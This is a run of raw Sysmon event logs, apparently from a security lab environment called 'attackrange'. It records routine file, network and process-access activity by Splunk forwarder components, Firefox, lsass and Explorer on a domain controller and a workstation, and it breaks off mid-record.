07:45:12.570{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\AlternateServices.txtMD5=437681975C3154D45D5D95B61D2F5B99,SHA256=491A570342F793C22823F7D5CD092CB3170E2F384187819DE7EADCC376CFCF46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:12.386{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DF8DDB0EE5E5FFA08D6F806C9C51305,SHA256=6EFD5766CFB26539EA99534E2DAA93C9F888B8D85C5C58E4DD444C996B6EAA7A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806233Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:09.491{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57167-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000806232Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:12.097{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=514A3884F1682A2D7C396C7B29B44648,SHA256=8EC19E7E881C53F029CD5B94BD960C1E69976D61D1EE0A61392A2E8592835DB6,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001046392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:12.370{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txt2021-07-09 11:40:00.447 23542300x80000000000000001046391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:12.370{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txtMD5=3E83EA0CB81B0B5FD20ABC9E0CBCDA53,SHA256=A0F05C51D45AE2D1CB3C3DAE7356534862F725095A3C2D51E89E8EADED34DE92,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:05.758{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50922-false10.0.1.12-8000- 23542300x80000000000000001046398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:13.400{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=723F1453F398B2CC3E575AE1FEA32C99,SHA256=9DF4272E14B2EC9C33B24EF1B4B3031EF55C9AA7FA320D7C8217EF6C5B8504A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806234Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:13.159{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A969951358CDF7A8AF3488BDC72BBBCE,SHA256=B339CDB010EBA11F92D8F2C13A87B0B36E21645C89E08978222669AEF51B1F7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:14.400{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=131B9421C53EBE064ABB261007FB2935,SHA256=CD3B76D75CBE8C8767896B0860CF1519F88A57D68C16557326BDBF922C991473,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806236Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:12.308{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57168-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806235Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:14.172{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B2F140DB0B6D9548A471A44D52F33F0,SHA256=23FB5AD4DAE2B7FB73A055DFAB056114562A78F1791A67552D1B5E94515BAEE0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.887{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT 
AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50923-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001046404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.887{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50923-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001046403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:15.415{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB59CB561D812F324543AA37D7AE18F2,SHA256=7A8F97C3D4F5B2E09080F3FD9D890F07A5E761990E350B1A550C17941AF24F16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806237Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:15.172{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15816816388C2A9238773041885BC7DB,SHA256=F9306988C5849C831E61579EDEA681A4FCB5DF9BDA4D1C7955D823CFD50FBDCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:15.351{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3D162B1B36F3E948E03DAC4626BB667C,SHA256=60404DCCE3D6AF264081902350106F86CCD4830CE6DBAA923B2B86BFE6A54A11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:15.350{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=67C81478DF0D8F416C51AE3ED34C2D1A,SHA256=421832B6BD625ACE8673263D4FC1AA1D22A8E7FD2EE1EE9D7EC0534D47C939F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:16.429{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED5C0ADDF6C986333624A23623281F2E,SHA256=CA9B833F600C480CB243C738C323C96831A12CD9CC9C4F769BBF68A06CFB5989,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806238Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:16.172{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4CFBD925751B43C6CD37985BC2A4B18,SHA256=4B4764F7C8DA6CC49628B9A213B563FA4D6394A0D20BF8EB1D7DD3E775069DCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:17.466{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BE571EF201FC5EC2DE936A02CFAA0DA,SHA256=F736D3146A4CAA129D751260ED0C6EB60806F180EB813B248AF3212CFB6D8048,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806239Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:17.188{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F64BE4EB9F3C3E83200B8C68CDA20CBB,SHA256=54EF00A8E3A1D45FC90789CF0C4F6CCC2E976C3AB7277447DB4C0691BAFA0B70,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:10.783{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50924-false10.0.1.12-8000- 10341000x80000000000000001046416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:18.727{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:18.727{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:18.727{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:18.727{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:18.727{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:18.727{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:18.727{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:18.481{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07842C865AE455439593DFC88E82FC0A,SHA256=01C23E0F290EE3C729910EB3617056B22DCFD3FEA8CC77AF0B5E302F8F14CA5D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806241Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:17.352{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57169-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 
23542300x8000000000000000806240Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:18.250{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE85434C526364DAF8EF89ACE9E19ED0,SHA256=BE8A1B20CFAD0EAA3C6E0C72EDE1341856322558614F22379E6D3BCBAC9CFEBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:18.165{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:19.496{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29D60DF9D71D6CD49730C72EFF73952A,SHA256=2CFFFE6E446DB2E5EF49EBE92772D4004B1B1D5A259B38469D20AA96A0549928,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806242Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:19.266{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAFB1C7DDB6DAF4D42C3E63670F5EFC7,SHA256=58C678E8507785DB1F6A0FC871CE7A91AF6479424BF1893D061A86D65AE0DAC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:20.511{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2852E47CF15CA79437DE9EC883312403,SHA256=D6AE6FB3F997E57B735D207EEDFA9C9C89BB9370696630141E48B1F3765A023C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806244Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:20.344{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806243Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:20.266{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F0A405F8AEF00841DD79613E78811D6,SHA256=E084B227EF9EFA159515EA31488D66FD033AE7617B7287E8CD4FAE11487D230C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:21.525{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8589A24C57EE2710C274DA9B7F499228,SHA256=A2A339A528D2787835742CE87A4F8A43F73E706A89B0766EFCEC33818E215E93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806245Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:21.297{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB417631B2095ADFB0485FAE5C85CFDB,SHA256=BC9F0410D3FDACE6AB0D397A0F98DEB876A45D8A18E7B323762AAF071518C28A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:22.561{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF809805748DC87909E3C1B2CE65A72C,SHA256=16333A0030876BEC3C0B8A66F6F6389EEC7659F9C17FE220BF16DC49AFB3432C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806247Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:22.328{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C19F45DACBF12B45AFEF6783DE67656,SHA256=95C933F2ABE7445B38DE7B87A28727C8696A6246EA1CD4EDB063C62E88B661F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806246Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:20.477{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57170-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001046422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:23.591{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=985ADFB7EAC16280E3E9B43532EA8149,SHA256=499EA559E3FA6BFE8378FFAA3A2F41AB0906C1EDB3506896853EF2DE79686954,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806248Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:23.375{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC2C9B0BC2A96B0B6EB078BC2D972DAB,SHA256=55B4A5FF4CC4EF433F6BE013AF61B0F39B4716C25CF12E299B3DBE6208305168,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:16.715{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50925-false10.0.1.12-8000- 23542300x80000000000000001046423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:24.606{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC6D2F23F5A431663A72DC582B2B83D5,SHA256=39871D7BB21C7780DFBC555443F8292AAA05FCCD4399D5BBDEDA093DABE2E868,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806275Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.781{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F314-60EB-4379-00000000D001}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806274Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 